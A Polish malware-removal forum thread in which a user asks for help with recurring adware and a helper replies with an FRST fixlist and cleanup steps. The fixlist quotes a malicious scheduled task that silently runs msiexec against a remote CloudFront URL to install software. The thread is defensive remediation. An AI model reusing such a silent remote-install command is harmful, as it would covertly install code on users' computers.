007marc Opublikowano 25 Maja 2017 Zgłoś Udostępnij Opublikowano 25 Maja 2017 Witam mam problem z infekcją komputera (przeglądarki) . Tydzień temu zauważyłem że zainstalowały mi się powyższe oprogramowania + opera (której nigdy nie używałem) oraz zwykła (32bit) dodatkowa wersja Firefoxa (używam wersji 64bit) . Komputer użytkuję z synem więc nie jestem pewien kiedy i przez co został zainfekowany . Sprawdziłem Malwarebytes Premium (znalezione infekcje zostały poddane kwarantannie) ,Adwcleaner - to co znalazł zostało usunięte .. W międzyczasie znalazłem artykuł - http://informatycznezycie.blogspot.com/2015/02/jak-usunac-adware-right-couponmyapps.html , według którego użyłem : RKill i JRT ,ComboFix nie mogę użyć - mam Win10 64bit . Przez 4-5 dni wszystko było OK (w międzyczasie parę razy użyłem Malwarebytes i Adwcleaner = czysto) ,dzisiaj po paru godzinach bezproblemowego użytkowania kompa i przeglądarki naraz zauważyłem ze coś Firefox zaczął "chodzić" ciężko ,z dwa razy zrestartował i na nowo zainstalowały mi się te "śmiecie" co poprzednio (zaznaczam że nie instalowałem żadnego nowego oprogramowania) . Poniżej wrzucam raporty z FRST ,niestety GMER rzuca BSOD nawet po uruchomieniu w trybie awaryjnym (restart Kompa) ! P.S. zapomniałem dodać że wszystko się zaczęło (i teraz powróciło) od wyskakujących okienek (reklam) przy przeglądaniu stron typu : Gorące reklamy ,Najlepsze reklamy - pomimo zainstalowanego : uBlock Origin i Disconnect !! Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 26 Maja 2017 Zgłoś Udostępnij Opublikowano 26 Maja 2017 według którego użyłem : RKill i JRT ,ComboFix nie mogę użyć - mam Win10 64bit . Całe szczęście, że nie mogłeś go użyć. Autor tego bloga nie wie co zaleca - KLIK. Raport niekompletne. Gdzie log z MBAM i AdwCleaner? Nie mam już ochoty się o to dopraszać, więc jadę od nowa ze skanami. Meritum: widać sporo szczątek po infekcjach adware. Podejrzewam uszkodzenie Zmiennej środowiskowej Path - widoczne są ścieżki relatywne. Na razie poszerzam diagnostykę, nie wdrążam rekonstrukcji. 1. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1 HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia GroupPolicyScripts: Ograniczenia HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-1280168119-2054726452-3514120849-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = S2 Bonjour Service; Brak ImagePath S2 Origin Web Helper Service; Brak ImagePath S3 Sense; "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" [X] S2 SkypeUpdate; Brak ImagePath U3 uxldipod; C:\Users\007marc\AppData\Local\Temp\uxldipod.sys [56584 2017-05-23] (GMER) [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePath U4 DiagTrack; Brak ImagePath U4 TimeBroker; Brak ImagePath Task: {A15E2711-C513-4908-B7D5-948AEBC71353} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phisokanadaing => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SamsungXSSDX850XEVOX1TB_S2RFNX0H605538A&d=20170512 /q HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "3O5H6RIBDJDQQYO" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "D7HWVT7HVLJZMMT" C:\Users\007marc\AppData\Roaming\Songbird2 C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk C:\Users\007marc\Desktop\BD-RE.lnk C:\Users\007marc\Desktop\Ghost Files.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\= INNE =\Skype.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google ] DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google CMD: set CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Paweł\AppData\Local CMD: dir /a C:\Users\Paweł\AppData\LocalLow CMD: dir /a C:\Users\Paweł\AppData\Roaming Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). songbird2 Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
007marc Opublikowano 27 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 27 Maja 2017 Wykonane według poleceń ,wstawiam piki .. fixlist.txt SearchReg.txt AdwCleanerS0.txt Addition.txt FRST.txt Shortcut.txt MBAM.txt Odnośnik do komentarza
Miszel03 Opublikowano 27 Maja 2017 Zgłoś Udostępnij Opublikowano 27 Maja 2017 A gdzie kluczowy plik Fixlog? Odnośnik do komentarza
007marc Opublikowano 27 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 27 Maja 2017 Pardon ,pewnie jak zauważyłeś przez pomyłkę zamiast Fixlog wstawiłem niepotrzebnie fixlist ,poprawiam się ... -------------------------------------------------------------- P.S. pomimo wykonania czynności które mi podałeś nadal pokazuje mi się taki "syf" - Fixlog.txt Odnośnik do komentarza
007marc Opublikowano 29 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 29 Maja 2017 "W międzyczasie" odinstalowałem Firefoxa ,wyczyściłem katalogi i wszystko co z nim związane (a tak przynajmniej myślę) ,gruntowne czyszczenie zawartości kompa ... Minęła doba intensywnego użytkowania komputera ,przeglądania stron czyli użytkowania internetu i jak dotąd wszystko chodzi bezproblemowo i płynnie - bez jakikolwiek wyskakujących okienek czy instalującego się "samoistnie" oprogramowania . Wstawiam na nowo Raporty ,Proszę o sprawdzenie : Addition.txt FRST.txt Shortcut.txt AdwCleanerS2.txt MBAM.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się